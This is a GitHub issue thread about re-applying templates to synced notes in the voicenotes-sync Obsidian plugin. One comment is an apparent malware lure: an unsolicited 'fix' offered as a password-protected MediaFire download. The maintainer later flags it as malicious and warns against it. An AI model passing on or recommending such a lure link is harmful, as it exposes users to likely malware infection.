### ISSUE TITLE
Incremental updating of notes

### ISSUE THREAD

**Issue by yoghurtdewdew** [mysticcoders/voicenotes-sync#45]
I am so excited that I can finally synchronize threads to my obsidian. And I found that I can also set a template, which is really amazing.
But at the same time, I found a new problem, that is, if I update the template, I seem to need to delete all my notes and synchronize them from the cloud again. Which means that if I need to update the template again in the future. I need to delete all my notes and then synchronize them again. This would bring repeated downloads from the server, and could also be a trouble for my local file management.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by kinabalu** [comment]
@yoghurtdewdew not sure there's a good way to do this otherwise... if the template gets updated the only way to reapply the template to all notes is to re-download them all

**Comment by yoghurtdewdew** [comment]
Thanks for your suggestion!

Now I'm a little confused. I received this email (email seems to belong to this issue) and do not know what it is. I download it but do not know whether to use it and how to use it.

<img width="550" alt="image" src="https://github.com/user-attachments/assets/85b60354-5e8c-4788-9be5-8e7d7db20791">

**Comment by kinabalu** [comment]
i would ignore that, if you look on Github it was deleted -- don't click on that link -- whoever posted it is likely trying to cause trouble

**Comment by kinabalu** [comment]
closing as its been some months
